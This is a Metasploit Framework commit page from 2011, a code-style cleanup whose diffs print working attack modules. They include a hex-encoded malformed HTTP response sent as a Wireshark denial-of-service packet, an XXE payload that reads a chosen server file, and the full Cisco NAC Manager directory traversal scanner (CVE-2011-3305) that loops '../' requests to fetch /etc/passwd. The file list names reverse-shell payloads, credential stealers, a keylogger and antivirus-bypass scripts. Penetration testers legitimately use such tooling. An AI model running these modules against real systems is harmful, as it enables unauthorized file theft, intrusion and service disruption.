Permalink
Browse files

big msftidy pass, ping me if there are issues

git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da
  • Loading branch information...
1 parent 5caaedc commit 62c8c6ea9fa27a1a36f8cb36282e5f81654eb494 @jduck jduck committed Oct 23, 2011
Showing with 2,607 additions and 2,386 deletions.
  1. +50 −2 modules/auxiliary/dos/wireshark/chunked.rb
  2. +9 −1 modules/auxiliary/scanner/http/adobe_xml_inject.rb
  3. +83 −83 modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
  4. +3 −1 modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb
  5. +3 −1 modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
  6. +2 −2 modules/auxiliary/scanner/http/scraper.rb
  7. +2 −1 modules/auxiliary/scanner/oracle/isqlplus_login.rb
  8. +6 −3 modules/auxiliary/scanner/postgres/postgres_login.rb
  9. +157 −157 modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
  10. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb
  11. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
  12. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb
  13. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb
  14. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb
  15. +192 −192 modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb
  16. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb
  17. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb
  18. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb
  19. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb
  20. 0 modules/auxiliary/scanner/sap/sap_service_discovery.rb
  21. +2 −2 modules/auxiliary/scanner/voice/recorder.rb
  22. +6 −4 modules/auxiliary/server/capture/smb.rb
  23. +1 −1 modules/auxiliary/server/webkit_xslt_dropper.rb
  24. +3 −3 modules/auxiliary/spoof/wifi/airpwn.rb
  25. +10 −4 modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb
  26. +2 −2 modules/auxiliary/vsploit/pii/web_pii.rb
  27. +4 −1 modules/exploits/linux/pptp/poptop_negative_read.rb
  28. +10 −10 modules/exploits/multi/http/glassfish_deployer.rb
  29. +2 −2 modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
  30. +2 −2 modules/exploits/solaris/sunrpc/sadmind_exec.rb
  31. +3 −1 modules/exploits/unix/webapp/php_vbulletin_template.rb
  32. +3 −1 modules/exploits/unix/webapp/php_xmlrpc_eval.rb
  33. +4 −3 modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
  34. +1 −1 modules/exploits/windows/browser/citrix_gateway_actx.rb
  35. +2 −2 modules/exploits/windows/browser/mozilla_interleaved_write.rb
  36. +3 −3 modules/exploits/windows/browser/mozilla_mchannel.rb
  37. +14 −6 modules/exploits/windows/browser/ms08_078_xml_corruption.rb
  38. +3 −2 modules/exploits/windows/browser/ms10_002_aurora.rb
  39. +3 −1 modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
  40. +1 −2 modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
  41. +1 −1 modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
  42. +34 −34 modules/exploits/windows/browser/pcvue_func.rb
  43. +25 −25 modules/exploits/windows/browser/teechart_pro.rb
  44. +3 −2 modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
  45. +3 −2 modules/exploits/windows/fileformat/adobe_libtiff.rb
  46. +2 −2 modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
  47. +2 −1 modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb
  48. +2 −2 modules/exploits/windows/fileformat/deepburner_path.rb
  49. 0 modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
  50. +7 −7 modules/exploits/windows/fileformat/ezip_wizard_bof.rb
  51. +1 −1 modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
  52. +5 −6 modules/exploits/windows/fileformat/scadaphone_zip.rb
  53. +4 −3 modules/exploits/windows/http/hp_nnm_ovas.rb
  54. +1 −1 modules/exploits/windows/http/hp_power_manager_filename.rb
  55. +1 −0 modules/exploits/windows/http/osb_uname_jlist.rb
  56. +1 −2 modules/exploits/windows/misc/wireshark_packet_dect.rb
  57. +4 −0 modules/payloads/singles/linux/armle/adduser.rb
  58. +12 −0 modules/payloads/singles/linux/x64/exec.rb
  59. +12 −0 modules/payloads/singles/linux/x64/shell_bind_tcp.rb
  60. +12 −0 modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
  61. +1 −0 modules/payloads/singles/windows/exec.rb
  62. +1 −0 modules/payloads/singles/windows/loadlibrary.rb
  63. +1 −1 modules/payloads/stagers/java/reverse_https.rb
  64. +12 −0 modules/payloads/stagers/linux/x64/bind_tcp.rb
  65. +12 −0 modules/payloads/stagers/linux/x64/reverse_tcp.rb
  66. +12 −0 modules/payloads/stages/linux/x64/shell.rb
  67. +1 −0 modules/payloads/stages/osx/x86/bundleinject.rb
  68. +1 −0 modules/payloads/stages/windows/dllinject.rb
  69. +1 −0 modules/payloads/stages/windows/patchupdllinject.rb
  70. +4 −4 modules/post/multi/gather/dns_bruteforce.rb
  71. +19 −19 modules/post/multi/gather/dns_srv_lookup.rb
  72. +3 −3 modules/post/multi/gather/ping_sweep.rb
  73. +11 −11 modules/post/multi/manage/system_session.rb
  74. +1 −7 modules/post/windows/gather/arp_scanner.rb
  75. +1 −1 modules/post/windows/gather/bitcoin_jacker.rb
  76. +1 −1 modules/post/windows/gather/cachedump.rb
  77. +6 −6 modules/post/windows/gather/credentials/enum_cred_store.rb
  78. +4 −2 modules/post/windows/gather/credentials/filezilla_server.rb
  79. +36 −30 modules/post/windows/gather/credentials/outlook.rb
  80. +14 −14 modules/post/windows/gather/credentials/vnc.rb
  81. +2 −3 modules/post/windows/gather/credentials/windows_autologin.rb
  82. +2 −2 modules/post/windows/gather/dumplinks.rb
  83. +5 −5 modules/post/windows/gather/enum_dirperms.rb
  84. +15 −14 modules/post/windows/gather/enum_ms_product_keys.rb
  85. +7 −8 modules/post/windows/gather/memory_grep.rb
  86. +7 −7 modules/post/windows/gather/reverse_lookup.rb
  87. +4 −4 modules/post/windows/gather/usb_history.rb
  88. +2 −4 modules/post/windows/manage/autoroute.rb
  89. +4 −2 modules/post/windows/manage/delete_user.rb
  90. +2 −2 plugins/db_credcollect.rb
  91. +4 −4 plugins/ips_filter.rb
  92. +75 −74 plugins/lab.rb
  93. +2 −2 plugins/msfd.rb
  94. +355 −364 plugins/nessus.rb
  95. +34 −34 plugins/nexpose.rb
  96. +30 −22 plugins/openvas.rb
  97. +5 −5 plugins/pcap_log.rb
  98. +165 −165 plugins/wmap.rb
  99. +1 −1 plugins/xmlrpc.rb
  100. +8 −14 scripts/meterpreter/arp_scanner.rb
  101. +1 −0 scripts/meterpreter/autoroute.rb
  102. +33 −31 scripts/meterpreter/checkvm.rb
  103. +1 −0 scripts/meterpreter/credcollect.rb
  104. +11 −11 scripts/meterpreter/domain_list_gen.rb
  105. +3 −3 scripts/meterpreter/duplicate.rb
  106. +5 −5 scripts/meterpreter/enum_chrome.rb
  107. +27 −27 scripts/meterpreter/enum_firefox.rb
  108. +1 −0 scripts/meterpreter/enum_powershell_env.rb
  109. +1 −0 scripts/meterpreter/enum_putty.rb
  110. +3 −2 scripts/meterpreter/enum_vmware.rb
  111. +1 −2 scripts/meterpreter/event_manager.rb
  112. +10 −10 scripts/meterpreter/get_application_list.rb
  113. +1 −0 scripts/meterpreter/get_env.rb
  114. +4 −3 scripts/meterpreter/get_filezilla_creds.rb
  115. +6 −5 scripts/meterpreter/get_local_subnets.rb
  116. +3 −0 scripts/meterpreter/get_valid_community.rb
  117. +5 −4 scripts/meterpreter/getcountermeasure.rb
  118. +2 −2 scripts/meterpreter/gettelnet.rb
  119. +18 −17 scripts/meterpreter/hashdump.rb
  120. +1 −0 scripts/meterpreter/hostsedit.rb
  121. +1 −1 scripts/meterpreter/keylogrecorder.rb
  122. +1 −0 scripts/meterpreter/killav.rb
  123. +1 −0 scripts/meterpreter/metsvc.rb
  124. +1 −0 scripts/meterpreter/migrate.rb
  125. +23 −23 scripts/meterpreter/multi_console_command.rb
  126. +10 −9 scripts/meterpreter/multicommand.rb
  127. +1 −0 scripts/meterpreter/multiscript.rb
  128. +159 −155 scripts/meterpreter/netenum.rb
  129. +13 −12 scripts/meterpreter/panda_2007_pavsrv51.rb
  130. +1 −0 scripts/meterpreter/pml_driver_config.rb
  131. +3 −2 scripts/meterpreter/powerdump.rb
  132. +8 −7 scripts/meterpreter/prefetchtool.rb
  133. +12 −12 scripts/meterpreter/process_memdump.rb
  134. +42 −44 scripts/meterpreter/remotewinenum.rb
  135. +1 −0 scripts/meterpreter/scheduleme.rb
  136. +1 −0 scripts/meterpreter/schelevator.rb
  137. +7 −6 scripts/meterpreter/schtasksabuse.rb
  138. +5 −1 scripts/meterpreter/screen_unlock.rb
  139. +38 −36 scripts/meterpreter/screenspy.rb
  140. +1 −0 scripts/meterpreter/search_dwld.rb
  141. +203 −201 scripts/meterpreter/service_permissions_escalate.rb
  142. +1 −1 scripts/meterpreter/sound_recorder.rb
  143. +3 −1 scripts/meterpreter/srt_webdrive_priv.rb
  144. +1 −0 scripts/meterpreter/uploadexec.rb
  145. +2 −0 scripts/meterpreter/virtualbox_sysenter_dos.rb
  146. +208 −205 scripts/meterpreter/virusscan_bypass.rb
  147. +1 −0 scripts/meterpreter/vnc.rb
  148. +2 −2 scripts/meterpreter/webcam.rb
  149. +1 −0 scripts/meterpreter/win32-sshclient.rb
  150. +1 −0 scripts/meterpreter/win32-sshserver.rb
  151. +72 −76 scripts/meterpreter/winbf.rb
  152. +2 −2 scripts/meterpreter/wmic.rb
  153. +1 −0 scripts/shell/migrate.rb
  154. +1 −0 scripts/shell/spawn_meterpreter.rb
  155. +2 −1 tools/import_webscarab.rb
  156. +5 −5 tools/list_interfaces.rb
  157. +40 −40 tools/lm2ntcrack.rb
  158. +2 −0 tools/vxdigger.rb
  159. +2 −2 tools/vxencrypt.rb
  160. +2 −0 tools/vxmaster.rb
@@ -57,8 +57,56 @@ def run
p.tcp_sport = datastore['SPORT'].to_i
p.tcp_window = 3072
- # That's some mighty fine ASCII right there.
- p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
+ # The following hex blob contains an HTTP response with a chunked-encoding
+ # length of 0. The ASCII version is below in a block comment.
+ #
+ # We represent it like this to prevent tools from mangling the carriage
+ # returns within it.
+ #
+ p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75" +
+ "\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32" +
+ "\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39" +
+ "\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a" +
+ "\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28" +
+ "\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20" +
+ "\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31" +
+ "\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61" +
+ "\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c" +
+ "\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f" +
+ "\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65" +
+ "\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50" +
+ "\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34" +
+ "\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20" +
+ "\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" +
+ "\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50" +
+ "\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74" +
+ "\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33" +
+ "\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22" +
+ "\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20" +
+ "\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20" +
+ "\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20" +
+ "\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78" +
+ "\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e" +
+ "\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30" +
+ "\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f" +
+ "\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
+ "\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74" +
+ "\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d" +
+ "\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f" +
+ "\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53" +
+ "\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45" +
+ "\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30" +
+ "\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64" +
+ "\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44" +
+ "\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a" +
+ "\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78" +
+ "\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e" +
+ "\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72" +
+ "\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a" +
+ "\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
+ "\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74" +
+ "\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d" +
+ "\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
p.recalc
capture_sendto(p, rhost)
@@ -64,7 +64,15 @@ def run_host(ip)
"/lcds-samples/messagebroker/httpsecure", # LCDS -- SSL
]
- postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?><\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]><amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\"><body><object type=\"flex.messaging.messages.CommandMessage\"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
+ postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?>"
+ postrequest << "<\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>"
+ postrequest << "<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">"
+ postrequest << "<body><object type=\"flex.messaging.messages.CommandMessage\"><traits>"
+ postrequest << "<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>"
+ postrequest << "<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>"
+ postrequest << "<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>"
+ postrequest << "<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>"
+ postrequest << "<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
path.each do | check |
@@ -1,84 +1,84 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Remote::HttpClient
- include Msf::Auxiliary::WMAPScanServer
- include Msf::Auxiliary::Scanner
-
- def initialize
- super(
- 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
- 'Version' => '$Revision$',
- 'Description' => %q{
- This module tests whether a directory traversal vulnerablity is present
- in versions of Cisco Network Access Manager 4.8.x You may wish to change
- FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
- },
- 'References' =>
- [
- [ 'CVE', '2011-3305' ],
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WMAPScanServer
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module tests whether a directory traversal vulnerablity is present
+ in versions of Cisco Network Access Manager 4.8.x You may wish to change
+ FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2011-3305' ],
[ 'OSVDB', '76080'],
- [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
- [ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
- ],
- 'Author' => [ 'nenad' ],
- 'License' => MSF_LICENSE
- )
-
- register_options(
- [
- Opt::RPORT(443),
- OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
- OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
- ], self.class)
- end
-
- def run_host(ip)
-
- traversal = '../../'
- part1= '/admin/file_download?tag='
- part2 = '&fileType=snapshot'
-
- begin
- print_status("Attempting to connect to #{rhost}:#{rport}")
- res = send_request_raw(
- {
- 'method' => 'GET',
- 'uri' => '/admin',
- }, 25)
-
- if (res)
- 1.upto(datastore['MAXDIRS']) do |level|
- try = traversal * level
- traversalstring = part1 + try + datastore['FILE'] + part2
- res = send_request_raw(
- {
- 'method' => 'GET',
- 'uri' => traversalstring,
- }, 25)
- if (res and res.code == 200)
- print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
- break
- elsif (res and res.code)
- print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
- end
- end
- end
-
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- rescue ::Timeout::Error, ::Errno::EPIPE
- end
- end
-end
+ [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
+ [ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
+ ],
+ 'Author' => [ 'nenad' ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
+ OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
+ ], self.class)
+ end
+
+ def run_host(ip)
+
+ traversal = '../../'
+ part1= '/admin/file_download?tag='
+ part2 = '&fileType=snapshot'
+
+ begin
+ print_status("Attempting to connect to #{rhost}:#{rport}")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/admin',
+ }, 25)
+
+ if (res)
+ 1.upto(datastore['MAXDIRS']) do |level|
+ try = traversal * level
+ traversalstring = part1 + try + datastore['FILE'] + part2
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => traversalstring,
+ }, 25)
+ if (res and res.code == 200)
+ print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
+ break
+ elsif (res and res.code)
+ print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
+ end
+ end
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+end
@@ -124,7 +124,9 @@ def run_host(ip)
return if not conn
- webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
+ webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
+ '<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
+ '<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
File.open(datastore['DICTIONARY'], 'rb').each do |testf|
begin
@@ -59,7 +59,9 @@ def run_host(ip)
vhost = datastore['VHOST'] || wmap_target_host
prot = datastore['SSL'] ? 'https' : 'http'
- webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
+ webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
+ '<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
+ '<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
begin
res = send_request_cgi({
View
@@ -1,5 +1,5 @@
##
-# $Id: $
+# $Id$
##
##
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'HTTP Page Scraper',
- 'Version' => '$Revision: 13183 $',
+ 'Version' => '$Revision$',
'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
'Author' => ['et'],
'License' => MSF_LICENSE
@@ -46,7 +46,8 @@ def initialize
OptString.new('URI', [ true, 'Oracle iSQLPlus path.', '/isqlplus/']),
OptString.new('SID', [ false, 'Oracle SID' ]),
OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 60]),
- OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
+ OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
], self.class)
@@ -40,9 +40,12 @@ def initialize(info = {})
register_options(
[
- OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
- OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
